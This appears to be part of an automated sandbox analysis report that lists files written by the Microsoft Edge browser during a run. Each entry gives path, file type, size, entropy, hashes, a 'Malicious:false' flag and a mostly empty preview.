                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):524656
                                                                                                                                                                                                                                                                                Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:LsulHNSsKllt:LsWM/t
                                                                                                                                                                                                                                                                                MD5:8FCC495CE66C056CC013C68A0FB97551
                                                                                                                                                                                                                                                                                SHA1:C26A9D9D1C518E63924324CB9F74CEEF256FFE62
                                                                                                                                                                                                                                                                                SHA-256:1AF31A86F80B3FBF4A4673BBCCAD4FDA796E2BDC48806BBAF12E1617746781FF
                                                                                                                                                                                                                                                                                SHA-512:DBF0AF819E177B1A1DDA1D7718944C7633DBAF32EE292756EC7854E992DAE4E8774D009532AD81BE91CAD44CEE6C2B95B56AA925378E0BDCBE71BB3DCFC42374
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.........................................h.s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:LsNlKe1:Ls3Ke1
                                                                                                                                                                                                                                                                                MD5:8B0DB3CF15C38A891F6A907FD9515093
                                                                                                                                                                                                                                                                                SHA1:11E0EBFDEC28B9ACD811254231629C6AFB03461F
                                                                                                                                                                                                                                                                                SHA-256:E54F8C2A3E30C8034E674A059025991A16D1C3E384A9C0EA7BEBB36EF0CE579A
                                                                                                                                                                                                                                                                                SHA-512:33A3EA24FED9255D0D6F378C08E404BAC6AAF54C31970627AEE1F21C2FAA31F634AA93B812EE0B4C3F682DD324AC0ED9C16B9D53FA26FD4E27D139965A047AA5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.........................................-..s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):432
                                                                                                                                                                                                                                                                                Entropy (8bit):5.2401902926369575
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:7hoOvYfYebvqBQFUt7re/9G5JfYebvqBvJ:7hFYfYebvZg7EQJfYebvk
                                                                                                                                                                                                                                                                                MD5:7E66F0541BCA14A4B7AED3E617096002
                                                                                                                                                                                                                                                                                SHA1:44C8F2141CA2C898D4A1A945616FB682A7E507DA
                                                                                                                                                                                                                                                                                SHA-256:BB5101498D38FA318127CBC0EDA5DCA2A3B8B096D8B06DBA04DFF3DDE7441A45
                                                                                                                                                                                                                                                                                SHA-512:7287B0F292429DB4E105B97192BC6DEF42815A60AF9C96DD725D6C5F27F12E448B2C1CA5017B708FE0432DF7C75DB003D232ED38A67967139468882DA1783538
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.785 2380 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:52:29.787 2380 Recovering log #3.2025/03/08-18:52:29.800 2380 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):432
                                                                                                                                                                                                                                                                                Entropy (8bit):5.2401902926369575
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:7hoOvYfYebvqBQFUt7re/9G5JfYebvqBvJ:7hFYfYebvZg7EQJfYebvk
                                                                                                                                                                                                                                                                                MD5:7E66F0541BCA14A4B7AED3E617096002
                                                                                                                                                                                                                                                                                SHA1:44C8F2141CA2C898D4A1A945616FB682A7E507DA
                                                                                                                                                                                                                                                                                SHA-256:BB5101498D38FA318127CBC0EDA5DCA2A3B8B096D8B06DBA04DFF3DDE7441A45
                                                                                                                                                                                                                                                                                SHA-512:7287B0F292429DB4E105B97192BC6DEF42815A60AF9C96DD725D6C5F27F12E448B2C1CA5017B708FE0432DF7C75DB003D232ED38A67967139468882DA1783538
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.785 2380 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/03/08-18:52:29.787 2380 Recovering log #3.2025/03/08-18:52:29.800 2380 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5c6e63c8-0e6f-4e1b-89af-4db9bd954f6c.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\77241a88-1eb4-4ce8-8d7b-2399367169f3.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):193
                                                                                                                                                                                                                                                                                Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF3564f.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):193
                                                                                                                                                                                                                                                                                Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                Entropy (8bit):0.555790634850688
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                                                                                                SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                                                                                                SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                                                                                                SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF25058.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
